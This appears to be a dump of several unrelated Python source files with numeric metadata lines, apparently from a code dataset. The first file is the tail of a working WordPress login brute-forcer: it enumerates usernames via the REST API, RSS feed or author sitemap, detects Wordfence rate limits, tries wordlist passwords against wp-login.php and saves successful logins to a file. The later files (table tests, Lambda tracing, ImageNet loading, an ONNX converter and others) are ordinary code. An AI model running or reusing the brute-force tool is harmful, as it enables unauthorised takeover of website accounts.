False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
31.399293
388
0.679721
1,289
8,886
4.624515
0.223429
0.007046
0.027177
0.019963
0.41436
0.393055
0.33954
0.296427
0.241738
0.228988
0
0.028727
0.153838
8,886
282
389
31.510638
0.764064
0.059419
0
0.344498
0
0.043062
0.325699
0.039333
0
0
0
0
0
1
0.062201
false
0.124402
0.033493
0
0.191388
0.095694
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc49b99b0326493e147f5f9c2af303341e2290ed
2,422
py
Python
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
34.6
86
0.547069
316
2,422
4.091772
0.218354
0.092807
0.148492
0.204176
0.492653
0.440062
0.402939
0.402939
0.402939
0.402939
0
0.143322
0.239472
2,422
69
87
35.101449
0.558632
0.066061
0
0.306122
0
0
0.305112
0.159212
0
0
0
0
0.040816
1
0.040816
false
0
0.142857
0
0.244898
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc557f84938097fbd8c0d95d4d05c57f1ad0bde0
4,093
py
Python
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
1
2021-01-24T12:08:18.000Z
2021-01-24T12:08:18.000Z
# Copyright 2020, OpenTelemetry Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # TODO: usage """ The opentelemetry-instrumentation-aws-lambda package allows tracing AWS Lambda function. Usage ----- .. code:: python # Copy this snippet into AWS Lambda function # Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html import boto3 from opentelemetry.instrumentation.aws_lambda import ( AwsLambdaInstrumentor ) # Enable instrumentation AwsLambdaInstrumentor().instrument() # Lambda function def lambda_handler(event, context): s3 = boto3.resource('s3') for bucket in s3.buckets.all(): print(bucket.name) return "200 OK" API --- """ import logging import os from importlib import import_module from wrapt import wrap_function_wrapper # TODO: aws propagator from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import ( AwsXRayFormat, ) from opentelemetry.instrumentation.aws_lambda.version import __version__ from opentelemetry.instrumentation.instrumentor import BaseInstrumentor from opentelemetry.instrumentation.utils import unwrap from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider logger = logging.getLogger(__name__) class AwsLambdaInstrumentor(BaseInstrumentor): def _instrument(self, **kwargs): self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider")) self._tracer_provider = get_tracer_provider() lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) wrapped_names = lambda_handler.rsplit(".", 1) self._wrapped_module_name = wrapped_names[0] self._wrapped_function_name = wrapped_names[1] wrap_function_wrapper( self._wrapped_module_name, self._wrapped_function_name, self._functionPatch, ) def _uninstrument(self, **kwargs): unwrap( import_module(self._wrapped_module_name), self._wrapped_function_name, ) def _functionPatch(self, original_func, instance, args, kwargs): lambda_context = args[1] ctx_aws_request_id = lambda_context.aws_request_id ctx_invoked_function_arn = lambda_context.invoked_function_arn orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) # TODO: enable propagate from AWS by env variable xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "") lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME") function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION") propagator = AwsXRayFormat() parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id}) with self._tracer.start_as_current_span( name=orig_handler, context=parent_context, kind=SpanKind.SERVER ) as span: # Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example span.set_attribute("faas.execution", ctx_aws_request_id) span.set_attribute("faas.id", ctx_invoked_function_arn) # TODO: fix in Collector because they belong resource attrubutes span.set_attribute("faas.name", lambda_name) span.set_attribute("faas.version", function_version) result = original_func(*args, **kwargs) # force_flush before function quit in case of Lambda freeze. self._tracer_provider.force_flush() return result
34.108333
151
0.716101
497
4,093
5.647887
0.382294
0.022444
0.029925
0.027075
0.133951
0.086926
0.066263
0.066263
0.034913
0.034913
0
0.006096
0.198387
4,093
119
152
34.394958
0.849436
0.374786
0
0.04
0
0
0.07109
0.020142
0
0
0
0.016807
0
1
0.06
false
0
0.2
0
0.3
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc62c8d6aa28b5a801e73fa4abc1d1fe577304dd
1,884
py
Python
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
from PIL import ImageDraw, Image from math import cos,sin,radians from random import randint import sys a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z" if len(a) > 128: print("TOO MANY CHARACTERS") sys.exit(1) # for i in a: # print("%s -> %d %d %d %d %d %d %d "%(i, # 1 if a.index(i) & 1 == 1 else 0, # 1 if a.index(i) & 2 == 2 else 0, # 1 if a.index(i) & 4 == 4 else 0, # 1 if a.index(i) & 8 == 8 else 0, # 1 if a.index(i) & 16 == 16 else 0, # 1 if a.index(i) & 32 == 32 else 0, # 1 if a.index(i) & 64 == 64 else 0, # )) # sys.exit(0) WHITE=(255,255,255) PINK=(217,154,197) BLUE=(103,170,249) BLACK=(0,0,0) img = Image.new('RGB', (2560,1600), BLACK) id = ImageDraw.Draw(img) def hex(offset, size): points = [] x,y = offset for angle in range(0, 360, 60): x += cos(radians(angle)) * size y += sin(radians(angle)) * size points.append((x, y)) return points def drawHex(id, sx,sy,s,c): ox = sx - cos(radians(120)) * s oy = sy - sin(radians(120)) * s id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK) id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK) id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK) id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK) id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK) id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK) id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK) q = """This is a test 0123456789%""" s = 10 cutOff = int(2560/(s*7)) print (cutOff) x,y = 0,0 for c in q: drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c)) x+=1 if x >= cutOff or c == "\n": x,y = 0,y+1 img.show()
28.545455
113
0.537686
396
1,884
2.555556
0.270202
0.023715
0.027668
0.062253
0.362648
0.352767
0.310277
0.221344
0.221344
0.221344
0
0.107397
0.253716
1,884
66
114
28.545455
0.612376
0.196921
0
0
0
0.204545
0.061252
0.027963
0
0
0
0
0
1
0.045455
false
0
0.090909
0
0.159091
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc66cd08fbbe334f7cc1e76eb76063eb07e5b49e
673
py
Python
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
""" *mus . it . dia* The simple diatonic intervals. """ from .second import MinorSecond from .second import MajorSecond from .third import MinorThird from .third import MajorThird from .fourth import PerfectFourth from .fifth import Tritone from .fifth import PerfectFifth from .sixth import MinorSixth from .sixth import MajorSixth from .seventh import MinorSeventh from .seventh import MajorSeventh from .eighth import Octave __all__ = [ "MinorSecond", "MajorSecond", "MinorThird", "MajorThird", "PerfectFourth", "Tritone", "PerfectFifth", "MinorSixth", "MajorSixth", "MinorSeventh", "MajorSeventh", "Octave", ]
18.694444
33
0.708767
68
673
6.955882
0.426471
0.042283
0.067653
0
0
0
0
0
0
0
0
0
0.199108
673
35
34
19.228571
0.877551
0.071322
0
0
0
0
0.203612
0
0
0
0
0
0
1
0
false
0
0.461538
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
fc6780fb69ebe4416f273d6821ceb9f2cb3226e8
760
py
Python
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
# this file holds some common testing functions from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By depurl = "localhost:3000" def getElement(driver, xpath): return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath))) def login(driver, username, password): driver.get(depurl) elem = getElement(driver, "//input[@id='username']") elem.clear() elem.send_keys(username) elem = getElement(driver, "//input[@id='password']") elem.clear() elem.send_keys(password) elem.send_keys(Keys.RETURN) def logout(driver): elem = getElement(driver, "//a[text()='Logout']") elem.click()
33.043478
93
0.727632
98
760
5.571429
0.479592
0.117216
0.115385
0.102564
0.175824
0
0
0
0
0
0
0.009146
0.136842
760
23
94
33.043478
0.823171
0.059211
0
0.111111
0
0
0.112045
0.064426
0
0
0
0
0
1
0.166667
false
0.166667
0.166667
0.055556
0.388889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc69e76506c689aa4c8cc54b37cd338453f7483a
1,256
py
Python
scripts/convert_keras2onnx.py
ecmwf-lab/infero
4fec006175af48cd0313b2f89722c01636e961db
[ "Apache-2.0" ]
8
2021-12-20T06:24:16.000Z
2022-02-17T15:21:55.000Z
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
null
null
null
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
1
2021-10-04T10:14:23.000Z
2021-10-04T10:14:23.000Z
# # (C) Copyright 1996- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. # import os import numpy as np import argparse import keras import keras2onnx if __name__ == "__main__": """ Lightweight script to convert a keras model into a TFlite model """ parser = argparse.ArgumentParser("Data Augmentation") parser.add_argument('keras_model_path', help="Path of the input keras model") parser.add_argument('onnx_model_path', help="Path of the output onnx model") parser.add_argument("--verify_with", help="Check the model by passing an input numpy path") args = parser.parse_args() # load the keras model model = keras.models.load_model(args.keras_model_path) model.summary() # do the conversion onnx_model = keras2onnx.convert_keras(model, model.name) # write to file file = open(args.onnx_model_path, "wb") file.write(onnx_model.SerializeToString()) file.close()
30.634146
95
0.72293
181
1,256
4.878453
0.524862
0.06795
0.057758
0.038505
0.04983
0.04983
0
0
0
0
0
0.009823
0.18949
1,256
40
96
31.4
0.857564
0.33121
0
0
0
0
0.233957
0
0
0
0
0
0
1
0
false
0.058824
0.294118
0
0.294118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc6d62eed45d350cb72c202ceedfb98394117cd4
315
py
Python
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
__title__ = 'har2case' __description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.' __url__ = 'https://github.com/HttpRunner/har2case' __version__ = '0.2.0' __author__ = 'debugtalk' __author_email__ = '[email protected]' __license__ = 'Apache-2.0' __copyright__ = 'Copyright 2017 debugtalk'
39.375
84
0.771429
38
315
5.526316
0.736842
0.019048
0
0
0
0
0
0
0
0
0
0.038869
0.101587
315
8
85
39.375
0.70318
0
0
0
0
0
0.556962
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc7fb355e0004487d0ead15c251476f2cd39193b
2,658
py
Python
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
9
2021-03-30T20:43:26.000Z
2021-12-28T06:25:17.000Z
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
null
null
null
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
2
2021-03-31T01:19:48.000Z
2021-08-02T13:41:32.000Z
# Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import concurrent.futures import numpy as np import os from PIL import Image import torchvision from datasets import base from platforms.platform import get_platform def _get_samples(root, y_name, y_num): y_dir = os.path.join(root, y_name) if not get_platform().isdir(y_dir): return [] output = [(os.path.join(y_dir, f), y_num) for f in get_platform().listdir(y_dir) if f.lower().endswith('jpeg')] return output class Dataset(base.ImageDataset): """ImageNet""" def __init__(self, loc: str, image_transforms): # Load the data. classes = sorted(get_platform().listdir(loc)) samples = [] if get_platform().num_workers > 0: executor = concurrent.futures.ThreadPoolExecutor(max_workers=get_platform().num_workers) futures = [executor.submit(_get_samples, loc, y_name, y_num) for y_num, y_name in enumerate(classes)] for d in concurrent.futures.wait(futures)[0]: samples += d.result() else: for y_num, y_name in enumerate(classes): samples += _get_samples(loc, y_name, y_num) examples, labels = zip(*samples) super(Dataset, self).__init__( np.array(examples), np.array(labels), image_transforms, [torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) @staticmethod def num_train_examples(): return 1281167 @staticmethod def num_test_examples(): return 50000 @staticmethod def num_classes(): return 1000 @staticmethod def _augment_transforms(): return [ torchvision.transforms.RandomResizedCrop(224, scale=(0.1, 1.0), ratio=(0.8, 1.25)), torchvision.transforms.RandomHorizontalFlip() ] @staticmethod def _transforms(): return [torchvision.transforms.Resize(256), torchvision.transforms.CenterCrop(224)] @staticmethod def get_train_set(use_augmentation, resize): transforms = Dataset._augment_transforms() if use_augmentation else Dataset._transforms() return Dataset(os.path.join(get_platform().imagenet_root, 'train'), transforms) @staticmethod def get_test_set(resize): return Dataset(os.path.join(get_platform().imagenet_root, 'val'), Dataset._transforms()) @staticmethod def example_to_image(example): with get_platform().open(example, 'rb') as fp: return Image.open(fp).convert('RGB') DataLoader = base.DataLoader
33.225
115
0.677201
341
2,658
5.085044
0.363636
0.057093
0.023068
0.015571
0.113033
0.113033
0.113033
0.087659
0.053057
0
0
0.028612
0.211061
2,658
79
116
33.64557
0.798283
0.072611
0
0.148148
0
0
0.006922
0
0
0
0
0
0
1
0.185185
false
0
0.12963
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc8903dace15225a2f4484e8807d8da8761b6a96
2,761
py
Python
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
3
2019-10-28T02:52:46.000Z
2019-12-24T09:11:48.000Z
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding=utf-8 -*- # # Author: huangnj # Time: 2019/09/27 import traceback from functools import wraps from hdfs_kernel.constants import EXPECTED_ERROR_MSG, INTERNAL_ERROR_MSG from hdfs.util import HdfsError # == EXCEPTIONS == class SessionManagementException(Exception): pass class CommandNotAllowedException(Exception): pass class CommandExecuteException(Exception): pass # option parse Error class OptionParsingError(RuntimeError): pass class OptionParsingExit(Exception): def __init__(self, status, msg): self.msg = msg self.status = status # == DECORATORS FOR EXCEPTION HANDLING == EXPECTED_EXCEPTIONS = [HdfsError, SessionManagementException, CommandNotAllowedException, CommandExecuteException, OptionParsingExit, OptionParsingError] def handle_expected_exceptions(f): """A decorator that handles expected exceptions. Self can be any object with an "ipython_display" attribute. Usage: @handle_expected_exceptions def fn(self, ...): etc...""" exceptions_to_handle = tuple(EXPECTED_EXCEPTIONS) # Notice that we're NOT handling e.DataFrameParseException here. That's because DataFrameParseException # is an internal error that suggests something is wrong with LivyClientLib's implementation. @wraps(f) def wrapped(self, *args, **kwargs): try: out = f(self, *args, **kwargs) except exceptions_to_handle as err: # Do not log! as some messages may contain private client information self.send_error(EXPECTED_ERROR_MSG.format(err)) return None else: return out return wrapped def wrap_unexpected_exceptions(f, execute_if_error=None): """A decorator that catches all exceptions from the function f and alerts the user about them. Self can be any object with a "logger" attribute and a "ipython_display" attribute. All exceptions are logged as "unexpected" exceptions, and a request is made to the user to file an issue at the Github repository. If there is an error, returns None if execute_if_error is None, or else returns the output of the function execute_if_error. Usage: @wrap_unexpected_exceptions def fn(self, ...): ..etc """ @wraps(f) def wrapped(self, *args, **kwargs): try: out = f(self, *args, **kwargs) except Exception as e: self.logger.error(u"ENCOUNTERED AN INTERNAL ERROR: {}\n\tTraceback:\n{}".format(e, traceback.format_exc())) self.send_error(INTERNAL_ERROR_MSG.format(e)) return None if execute_if_error is None else execute_if_error() else: return out return wrapped
32.482353
119
0.694314
339
2,761
5.530973
0.40118
0.048
0.037333
0.0128
0.1632
0.112
0.088533
0.0608
0.0608
0.0608
0
0.004212
0.226005
2,761
84
120
32.869048
0.873187
0.3908
0
0.428571
0
0
0.031697
0
0
0
0
0
0
1
0.119048
false
0.095238
0.095238
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc992600a7f421e186b8dbe2ed6b420847313d4c
1,473
py
Python
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
####################################################################################################################### # Given a string, find the length of the longest substring which has no repeating characters. # # Input: String="aabccbb" # Output: 3 # Explanation: The longest substring without any repeating characters is "abc". # # Input: String="abbbb" # Output: 2 # Explanation: The longest substring without any repeating characters is "ab". # # Input: String="abccde" # Output: 3 # Explanation: Longest substrings without any repeating characters are "abc" & "cde". ####################################################################################################################### def longest_substring_no_repeating_char(input_str: str) -> int: window_start = 0 is_present = [None for i in range(26)] max_window = 0 for i in range(len(input_str)): char_ord = ord(input_str[i]) - 97 if is_present[char_ord] is not None: window_start = max(window_start, is_present[char_ord] + 1) is_present[char_ord] = i max_window = max(max_window, i - window_start + 1) return max_window print(longest_substring_no_repeating_char('aabccbb')) print(longest_substring_no_repeating_char('abbbb')) print(longest_substring_no_repeating_char('abccde')) print(longest_substring_no_repeating_char('abcabcbb')) print(longest_substring_no_repeating_char('bbbbb')) print(longest_substring_no_repeating_char('pwwkew'))
